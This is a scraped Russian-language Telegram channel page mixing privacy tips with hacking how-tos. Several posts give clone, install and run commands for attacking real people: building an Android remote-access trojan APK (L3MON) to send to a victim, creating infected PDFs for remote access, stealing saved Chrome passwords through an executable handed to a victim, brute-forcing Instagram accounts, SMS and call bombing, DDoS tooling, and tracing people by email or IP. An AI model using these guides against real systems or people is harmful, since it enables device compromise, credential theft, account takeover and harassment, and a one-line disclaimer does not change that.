CMD | IT – Telegram
CMD | IT
25.7K subscribers
2.4K photos
596 videos
10 files
3.87K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
Как скрыть свои данные от Windows 10

С каждым годом, слежка становится всё сильнее, понемногу забирая частицы свободы и конфиденциальности у пользователя. Защитить свои данные от Windows 10 поможет Windows Privacy Dashboard.

Программа позволяет настроить групповую политику, системные службы, планируемые задачи и остальные параметры, отвечающие за сбор и передачу информации на сервера Microsoft.

При использовании WPD можно настроить точку восстановления, это позволит обезопасить систему от необратимых последствий, а также санкций со стороны Microsoft.

▫️https://www.softportal.com/software-46698-windows-privacy-dashboard-wpd.html
🔥1
​​Очищаем URL на отслеживающих ссылках

Многие веб-сайты используют элементы отслеживания в URL-адресе, чтобы собирать статистику и следить за вашей онлайн-активностью. Эти части адреса не требуются для отображения или правильной работы веб-сайта, и могут быть удалены.

ClearURLs - расширение, созданное для автоматического удаления элементов отслеживания из URL-адресов, чтобы защитить вашу конфиденциальность при просмотре страниц в Интернете.

Плагин имеет гибкие настройки, а также может показывать журнал логирования и статистику по всем ссылкам, по которым вы переходили. Достаточно пользоваться им всего один день, чтобы ужаснуться от обилия отслеживающих элементов в ссылках, по которым вы переходили.

▫️Chrome / FireFox
ПОИСК ПО EMAIL

Emailsherlock — авто­мати­чес­кий поиск по email-адре­су. Най­дет, к каким сай­там при­вязан адрес поч­ты.

Про­вер­ка по нес­коль­ким поч­там дала не так мно­го резуль­татов, как хотелось бы. Поиск огра­ничен толь­ко самыми популяр­ными сай­тами (соц­сети).

Еще из минусов – сайт по‑чер­ному пиарит сто­рон­ние сер­висы, не все из которых даже живы, но поч­ти все про­сят денег.

▫️Emailsherlock.com
Как взломать дрон?

DroneSploit — утилита, основанная на sploitkit и попытка собрать методы взлома ориентированные на дроны.

Для простоты использования интерфейс имеет макет, похожий на Metasploit. В настоящее время он поддерживает только очень небольшое количество моделей дронов, но мы надеемся, что в ближайшем будущем мы будем приветствовать новые предложения.

Установка:

Необходимы:
1) Linux система;
2) Wi-Fi карта с режимом монитора (многие Wi-Fi адаптеры поддерживают этот режим);

$ sudo pip install dronesploit

Использование:

$ dronesploit

Github: https://github.com/dhondta/dronesploit

⚠️Помните! Вся информация предоставлена исключительно с целью ознакомления.
4 сервиса для сохранения анонимности в сети

В данном посте пойдёт речь про сервисы для обеспечения анонимности в сети интернет.

1. DuckDuckGo - этот поисковик не собирает никакую личную информацию о вас, не хранит историю поиска и ограничивает использование файлов cookies.

2. ProtonMail - почта, шифрует все сообщения и не имеет доступа к вашим персональным данным, а также у него есть большой опыт и надёжная репутация. Но сервис не всегда хорошо работает в России, понадобится VPN.

3. Wickr - мессенджер поддерживает анонимную регистрацию — нужно придумать ID и пароль. К тому же мессенджер не оставляет никаких следов на устройстве и серверах.

4. Sync - облачное хранилище вслепую шифрует ваши данные и расшифровывать их можете только вы, что надёжно защищает файлы. 5 ГБ места предоставляются бесплатно, а за 2 ТБ придётся заплатить $8 в месяц.
​​Как УБИТЬ телефон?

Spammer - это специализированная утилита, которая представляет из себя инструмент для атак с использованием SMS и Звонков.

Данная утилита написана на Python, работает в терминале и по заявлениям разработчика работает идеально, без ошибок.

Установка:
$ git clone https://github.com/cludeex/spammer
$ cd spammer
$ sh install.sh

Использование:

$ spammer

Более подробно об использовании данной утилиты можно почитать на официальной странице GitHub репозитория.

⚠️Помните! Вся информация предоставлена исключительно с целью ознакомления.
Сборник инструментов для хакера

В данном посте пойдёт речь про утилиту Easy Hack, ее помощью вы сможете осуществлять DDOS атаки разных уровней, проводить сканирование с помощью NMAP, проводить взлом пароля с использованием BruteForce и так далее.

Установка:
$ git clone https://github.com/sabri-zaki/EasY_HaCk
$ cd EasY_HaCk/
$ chmod +x install.sh
$ . /install.sh
$ Type EasY-HaCk

Использование:
Чтобы использовать функционал данной утилиты, вводим в терминал цифру от 1 до 8.
🔥1
Пробив человека по почте

В данном посте пойдёт речь про сервисы для осуществления OSINT разведки, т.е пробив, имея из данных только почту, все сервисы функционируют.

1. haveibeenpwned.com — проверка почты в слитых базах.

2. emailrep.io — найдет на каких сайтах был зарегистрирован аккаунт использующий определенную почту.

3. dehashed.com — проверка почты в слитых базах.

4. intelx.io — многофункциональный поисковик, поиск осуществляется еще и по даркнету.

5. @info_baza_bot — покажет из какой базы слита почта, 2 бесплатных скана.

6. leakedsource.ru — покажет в каких базах слита почта.

7. mostwantedhf.info — найдет аккаунт skype.
Как взломать телефон на Android?

В данном посте мы разберём утилиту, которая является пакетом удалённого управления Android под названием «L3MON» . L3MON - это облачный пакет для удалённого управления Android.

Установка:
$ git clone https://github.com/D3VL/L3MON.git
$ cd L3MON
$ cd server
$ npm install
$ npm audit fix

Использование:
$ pm2 start index.js
$ pm2 startup

Далее понадобится изменить пароль шифрования хэша MD5 и поместить его в файл конфигурации для защиты панели администратора.
$ echo -n "12345" | md5sum
$ nano maindb.json

Запустите localhost в браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа.
Как взломать ПК через PDF файл?

Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п. В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.

Установка:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh

Использование:
$ sudo python2 insanity.py

При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
2
​​Как узнать, кто брал ваш телефон?

Мобильный телефон - частная собственность, просматривать его содержимое можно только с разрешения владельца. Но как быть уверенным в том, что окружающие вас люди также уважают личные границы других, как и вы?

Есть секретный способ узнать, кто брал телефон в руки в ваше отсутствие. WTMP - приложение для Android, которое незаметно в фоновом режиме сделает фото пользователя каждый раз, когда кто-то входит в телефон, даже если попытка ввода пароля оказывается неудачной.

В случае успешного входа в телефон, утилита сможет составить список запущенных приложений. Отчеты можно просматривать в самой программе, а также можно настроить синхронизацию с Google-диском.

▫️Скачать
Новый пробив человека по IP

IPdrone - это инструмент сбора информации, который позволяет вам узнайте чье-лиюо местоположение, всего-лишь зная его белый IP-адрес. Данный инструмент является инструментом IP-поиска, который позволит вам получить большую часть информации о конкретном IP-адресе используя Termux.

Установка:
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone

Использование:
$ python ipdrone.py -v IP-адрес

Если вы перезапустите termux, то вам нужно сначала изменить свой каталог на папку IPdrone. Вместо IP-адреса вам просто будет необходимо ввести IP-адрес человека, о котором вы пытаетесь собрать информацию.
Как заработать от 1000 рублей в день?

Всем привет! Сегодняшний пост больше ориентирован на тех, кто не хочет заморачиваться с реализацией довольно сложных тем, на тех, кому будет достаточно и 1000 - 3000 рублей в день. На яхту или майбах вы вряд ли заработаете, но вот на повседневные нужды или стартовый капитал для более серьезных тем - легко.

Читать статью
👍1
​​Отключаем все трекеры в приложениях

Отслеживающие трекеры, собирающие информацию о вашем поведении, есть не только на веб-сайтах, но и в установленных приложениях на вашем смартфоне. И если сайты вас хоть как-то предупреждают об отслеживании, узнать о трекерах в приложениях не так уж и просто.

TrackerControl - это приложение для Android, которое позволяет пользователям узнать какие конкретно технологии отслеживания присутствуют в коде ваших приложений. Сервис позволяет выявлять компании, стоящие за отслеживанием и раскрывать их цели, такие как аналитика или реклама.

Разработчики заявляют, что приложение всегда будет бесплатным с открытым исходным кодом, так как это в первую очередь исследовательский проект. Разработка ведется при поддержке отделения компьютерных наук Оксфорда. Исходный код проекта доступен на GitHub.

▫️https://trackercontrol.org/
​​Как сделать второй монитор из Android

Не все знают, но ваш планшет или смартфон на Android можно легко использовать как второй монитор для компьютера на Windows. Причем речь не об удаленном доступе, а именно о полноценном втором мониторе, на который можно выводить отдельное изображение.

Программа SpaceDesk позволяет без труда настроить Android устройство в качестве второго монитора. Использовать это удобно, если вы работаете с графикой или занимаетесь разработкой приложений.

Настроить второй монитор просто:
1. На устройство Android установите бесплатное приложение SpaceDesk.
2. Скачайте и установите программу для Windows с официального сайта на свой компьютер.
3. Запустите программу на компьютере и приложение на планшете или смартфоне.
4. Приложение начнет автоматически искать сервер, подключенный к той же сети. Выберите из предложенного списка ваш компьютер и нажмите «Connection».

▫️https://www.spacedesk.net/
👍1
​​Как взломать Instagram в несколько кликов?

В данном посте пойдёт речь про осуществление атаки на аккаунт в социальной сети Instagram, путем перебора пароля. Данную атаку сможет провести даже обычный школьник.

Для проведения подобной атаки, достаточно следовать простой инструкции:

Установка:
$ git clone https://github.com/tiptoettt/instashell
$ cd instashell
$ chmod +x instashell.sh

Использование:

$ service tor start
$ ./instashell.sh

Далее введите Юзернейм аккаунта Instagram и путь до словаря паролей.
​​Как украсть пароли из аккаунта в Google

Большинство пользователей хранит свои пароли прямо в браузере, в так называемых "формах автозаполнения" Chrome.

ChromePass - это специализированная утилита, написанная на языке программирования Python, способная "добывать" сохраненные пароли в Chrome.

Установка:
$ git clone https://github.com/bierschi/chromepass
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt

Использование:
$ python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение. Файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.
​​Как скрыть свои действия от Google и убрать слежку?

Американская корпорация собирает о вас множество данных, но пользоваться ее экосистемой очень удобно. Если вас не пугает накопление сведений и вы пользуетесь сервисами компании, есть простой способ защитить историю ваших действий от посторонних глаз.

Google предлагает возможность поставить пароль на историю ваших действий, тогда при попытке ее просмотра или удаления, будет требоваться подтверждение личности. Это повысит уровень защиты данных на общих устройствах.

Чтобы активировать защиту, перейдите по ссылке в раздел «Мои действия в Google» → найдите опцию «Настроить проверку для доступа к истории моих действий» → выберите «Включить дополнительную проверку» и подтвердите свою личность.

▫️Ссылка
​​​​Моментально удаляем все данные с телефона

Перед продажей устройства всегда возникает необходимость в полном очищение хранилища от личных данных. Доверять заводскому сбросу настроек не стоит, ведь в интернете полно способов восстановления файлов.

Можно воспользоваться сторонними помощниками, например приложением Extirpater, которое уничтожит все данные на Android-устройстве без возможности восстановления. Перед применением стоит помнить, что подобные утилиты при частом использовании разрушают накопитель гаджета.

Алгоритм очищения достаточно прост, но эффективен: при стандартном удалении данных, файлы не уничтожаются, а лишь исчезают из индекса файловой системы. Данный же инструмент заполняет оставшееся пространство диска случайным шумом, а затем все начисто очищает.

▫️https://gitlab.com/divested-mobile/extirpater
👍1